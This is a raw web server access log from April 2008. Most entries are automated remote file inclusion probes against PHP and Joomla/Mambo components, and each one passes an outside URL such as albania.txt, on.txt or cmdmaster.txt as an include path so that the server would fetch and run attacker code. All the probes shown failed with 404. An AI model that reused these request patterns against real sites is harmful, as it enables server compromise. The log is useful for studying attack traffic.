200.201.48.20 - - [13/Apr/2008:17:51:24 -0600] "GET /logs/access_log.20080127//skin/zero_vote/error.php?dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 244 "-" "libwww-perl/5.803"
91.185.193.111 - - [13/Apr/2008:17:51:53 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:17:51:53 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
85.18.201.175 - - [13/Apr/2008:17:52:21 -0600] "GET /logs/error_log.20080330//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:17:52:22 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:17:52:22 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:17:52:28 -0600] "GET /logs/access_log.20080330//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
91.185.193.111 - - [13/Apr/2008:17:52:31 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:17:52:31 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
205.134.240.228 - - [13/Apr/2008:17:52:54 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
205.134.240.228 - - [13/Apr/2008:17:52:54 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
205.134.240.228 - - [13/Apr/2008:17:52:54 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
205.134.240.228 - - [13/Apr/2008:17:52:54 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
205.134.240.228 - - [13/Apr/2008:17:52:54 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
205.134.240.228 - - [13/Apr/2008:17:52:54 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
80.65.76.195 - - [13/Apr/2008:17:53:06 -0600] "GET /logs/access_log.20080316//modules/TotalCalendar/about.php?inc_dir=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
80.65.76.195 - - [13/Apr/2008:17:53:12 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
80.65.76.195 - - [13/Apr/2008:17:53:19 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
62.141.56.36 - - [13/Apr/2008:17:54:13 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
62.141.56.36 - - [13/Apr/2008:17:54:14 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
74.141.84.148 - - [13/Apr/2008:17:54:43 -0600] "GET /logs/access_log/index.php?go1=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
74.141.84.148 - - [13/Apr/2008:17:54:43 -0600] "GET /index.php?go1=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
74.141.84.148 - - [13/Apr/2008:17:54:43 -0600] "GET /logs/index.php?go1=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
62.141.58.56 - - [13/Apr/2008:17:55:07 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.141.58.56 - - [13/Apr/2008:17:55:07 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
205.134.240.228 - - [13/Apr/2008:17:56:44 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
205.134.240.228 - - [13/Apr/2008:17:56:45 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
62.241.35.170 - - [13/Apr/2008:17:58:10 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
62.241.35.170 - - [13/Apr/2008:17:58:10 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
62.241.35.170 - - [13/Apr/2008:17:58:11 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
200.201.48.20 - - [13/Apr/2008:17:58:35 -0600] "GET /logs/access_log//login.php?dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 220 "-" "libwww-perl/5.803"
74.6.18.251 - - [13/Apr/2008:18:00:32 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.9.155 - - [13/Apr/2008:18:00:32 -0600] "GET /logs/?D=A HTTP/1.0" 200 1468 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.75.218.240 - - [13/Apr/2008:18:01:06 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:18:01:07 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
72.30.226.190 - - [13/Apr/2008:18:02:07 -0600] "GET /logs/error_log HTTP/1.0" 200 5031 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
148.244.247.47 - - [13/Apr/2008:18:02:59 -0600] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wances.100webspace.net/tools/echo.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
74.6.22.107 - - [13/Apr/2008:18:03:01 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.7.104 - - [13/Apr/2008:18:03:06 -0600] "GET /logs/error_log HTTP/1.0" 200 5326 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.218 - - [13/Apr/2008:18:03:11 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
148.244.247.47 - - [13/Apr/2008:18:03:16 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wances.100webspace.net/tools/echo.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
74.6.20.226 - - [13/Apr/2008:18:03:21 -0600] "GET /logs/error_log.20080413 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.214.34.218 - - [13/Apr/2008:18:03:31 -0600] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://200.220.215.214/~teste/xpl/test.txt??? HTTP/1.1" 404 263 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.214.34.218 - - [13/Apr/2008:18:03:31 -0600] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://200.220.215.214/~teste/xpl/test.txt??? HTTP/1.1" 404 268 "-" "Mozilla/4.61 [en] (OS/2; U)"
74.6.23.30 - - [13/Apr/2008:18:04:50 -0600] "GET /logs/access_log.20080413 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.99.248.233 - - [13/Apr/2008:18:05:06 -0600] "GET /logs/access_log.20080330//ashnews.php?pathtoashnews=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:05:07 -0600] "GET //ashnews.php?pathtoashnews=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:05:07 -0600] "GET /logs//ashnews.php?pathtoashnews=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.69"
200.201.48.20 - - [13/Apr/2008:18:06:40 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 243 "-" "libwww-perl/5.803"
85.214.68.51 - - [13/Apr/2008:18:08:28 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
85.214.68.51 - - [13/Apr/2008:18:08:28 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
85.18.201.175 - - [13/Apr/2008:18:08:44 -0600] "GET /logs/access_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:08:45 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:08:51 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.99.248.233 - - [13/Apr/2008:18:08:53 -0600] "GET /logs//ashnews.php?pathtoashnews=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:08:53 -0600] "GET //ashnews.php?pathtoashnews=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.69"
85.18.201.175 - - [13/Apr/2008:18:08:57 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:08:59 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:08:59 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.99.248.233 - - [13/Apr/2008:18:09:07 -0600] "GET /logs/error_log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:09:08 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:09:08 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:09:10 -0600] "GET /logs/access_log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:09:30 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
74.53.197.2 - - [13/Apr/2008:18:11:22 -0600] "GET /logs/mygallerybrowser.php?myPath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:11:22 -0600] "GET /mygallerybrowser.php?myPath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
85.18.201.175 - - [13/Apr/2008:18:11:43 -0600] "GET /logs/error_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:11:44 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:11:44 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:18:12:07 -0600] "GET /logs/mygallerybrowser.php?myPath=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:18:12:07 -0600] "GET /mygallerybrowser.php?myPath=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:13:45 -0600] "GET /logs/access_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:18:13:50 -0600] "GET /logs/mygallerybrowser.php?myPath=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:18:13:50 -0600] "GET /mygallerybrowser.php?myPath=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
77.92.68.25 - - [13/Apr/2008:18:17:01 -0600] "GET /logs/mygallerybrowser.php?myPath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
77.92.68.25 - - [13/Apr/2008:18:17:01 -0600] "GET /mygallerybrowser.php?myPath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
85.18.201.175 - - [13/Apr/2008:18:18:21 -0600] "GET /logs/error_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
62.241.35.170 - - [13/Apr/2008:18:19:30 -0600] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
70.87.240.50 - - [13/Apr/2008:18:20:36 -0600] "GET /logs/mygallerybrowser.php?myPath=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
70.87.240.50 - - [13/Apr/2008:18:20:36 -0600] "GET /mygallerybrowser.php?myPath=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
62.75.218.240 - - [13/Apr/2008:18:21:53 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:18:21:53 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:18:21:53 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:18:22:16 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.76"
213.254.190.201 - - [13/Apr/2008:18:23:19 -0600] "GET /logs/error_log//include.php?path[docroot]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
80.65.76.195 - - [13/Apr/2008:18:23:56 -0600] "GET /logs/access_log//modules/TotalCalendar/about.php?inc_dir=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:23:59 -0600] "GET /logs/error_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:26:53 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:26:54 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.18.201.175 - - [13/Apr/2008:18:26:54 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
77.92.68.25 - - [13/Apr/2008:18:29:30 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
77.92.68.25 - - [13/Apr/2008:18:29:30 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
216.118.81.182 - - [13/Apr/2008:18:30:58 -0600] "GET /logs//components/com_joomlalib/standalone/cac.php?baseDir=http://h1.ripway.com/palenk77/cmdmaster.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
216.118.81.182 - - [13/Apr/2008:18:30:58 -0600] "GET //components/com_joomlalib/standalone/cac.php?baseDir=http://h1.ripway.com/palenk77/cmdmaster.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
74.53.197.2 - - [13/Apr/2008:18:31:41 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:31:41 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:31:42 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:32:03 -0600] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:32:03 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:32:03 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
85.18.201.175 - - [13/Apr/2008:18:32:13 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
74.53.197.2 - - [13/Apr/2008:18:32:16 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:18:32:16 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:18:34:24 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:18:34:24 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
200.201.48.20 - - [13/Apr/2008:18:35:54 -0600] "GET /logs/access_log.20080316//modules/TotalCalendar/about.php?inc_dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 251 "-" "libwww-perl/5.803"
200.201.48.20 - - [13/Apr/2008:18:35:54 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 226 "-" "libwww-perl/5.803"
200.201.48.20 - - [13/Apr/2008:18:35:55 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 231 "-" "libwww-perl/5.803"
74.53.197.2 - - [13/Apr/2008:18:37:24 -0600] "GET /logs/access_log.20080316//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
62.99.248.233 - - [13/Apr/2008:18:40:06 -0600] "GET /logs/send_reminders.php?includedir=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.69"
62.99.248.233 - - [13/Apr/2008:18:40:06 -0600] "GET /send_reminders.php?includedir=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.69"
85.214.34.218 - - [13/Apr/2008:18:44:37 -0600] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://200.220.215.214/~teste/xpl/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.214.34.218 - - [13/Apr/2008:18:44:37 -0600] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://200.220.215.214/~teste/xpl/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/4.61 [en] (OS/2; U)"
62.75.218.240 - - [13/Apr/2008:18:51:48 -0600] "GET /logs/error_log//Neos_Chronos/header.php?base_folder=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:18:51:49 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:18:51:49 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
74.53.197.2 - - [13/Apr/2008:18:51:52 -0600] "GET /logs/access_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
62.75.218.240 - - [13/Apr/2008:18:52:07 -0600] "GET /logs/access_log//Neos_Chronos/header.php?base_folder=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
91.185.193.111 - - [13/Apr/2008:18:55:24 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:18:55:25 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
88.167.21.85 - - [13/Apr/2008:18:56:13 -0600] "GET /logs/error_log//admin/business_inc/saveserver.php?thisdir=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
88.167.21.85 - - [13/Apr/2008:18:56:14 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
88.167.21.85 - - [13/Apr/2008:18:56:14 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
88.167.21.85 - - [13/Apr/2008:18:56:43 -0600] "GET /logs/access_log//admin/business_inc/saveserver.php?thisdir=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
88.167.21.85 - - [13/Apr/2008:18:59:05 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
